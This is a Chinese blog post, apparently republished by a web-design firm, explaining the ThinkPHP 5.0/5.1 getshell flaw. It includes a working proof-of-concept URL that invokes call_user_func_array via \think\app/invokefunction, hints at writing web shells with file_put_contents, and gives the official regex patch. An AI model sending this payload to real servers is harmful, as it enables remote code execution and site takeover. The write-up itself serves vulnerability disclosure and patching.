這篇文章將為大家詳細(xì)講解有關(guān)thinkphp5.0和5.1的getshell漏洞示例分析,小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,希望大家閱讀完這篇文章后可以有所收獲。
之前網(wǎng)站被提權(quán)了,那時(shí)候網(wǎng)站才建沒幾天,應(yīng)該不會(huì)有人故意為之,可能是批量掃描getshell的,為了方便我找的是開源系統(tǒng)thinkcmf建了博客,看著挺不錯(cuò)的,因?yàn)閠hinkcmf用的是thinkphp5.0的框架開發(fā)的,我到thinkphp.cn上去看了一下,原來有一個(gè)提權(quán)漏洞。
libaray/think/app.php文件中模塊,控制器,方法使用的是/來區(qū)分開來。
然后并沒有對(duì)控制器進(jìn)行過濾,導(dǎo)致可以構(gòu)造執(zhí)行各種函數(shù)
我在本地建一個(gè)虛擬主機(jī)測試http://cmf.com
構(gòu)造一個(gè)url訪問,可以直接打印出phpinfo:
http://cmf.com/index.php?s=portal/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
然后你可以把phpinfo換成其他函數(shù),比如使用file_put_content函數(shù)創(chuàng)建各種大馬小馬文件。
TP官方的修復(fù)5.0方法是:
在think\App
類的module
方法的獲取控制器的代碼后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }
我用的thinkcmf的版本是:ThinkCMF 5.0.180901
然后我看了一下thinkcmf的官網(wǎng)已經(jīng)更新到5.0.190111,新版也更新了tp5.0到新版本5.0.24了包含了安全更新,當(dāng)然也沒有這個(gè)提權(quán)漏洞了。
關(guān)于“thinkphp5.0和5.1的getshell漏洞示例分析”這篇文章就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,使各位可以學(xué)到更多知識(shí),如果覺得文章不錯(cuò),請(qǐng)把它分享出去讓更多的人看到。
網(wǎng)站名稱:thinkphp5.0和5.1的getshell漏洞示例分析-創(chuàng)新互聯(lián)
文章位置:http://chinadenli.net/article6/dsehig.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站營銷、面包屑導(dǎo)航、外貿(mào)建站、云服務(wù)器、動(dòng)態(tài)網(wǎng)站、搜索引擎優(yōu)化
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容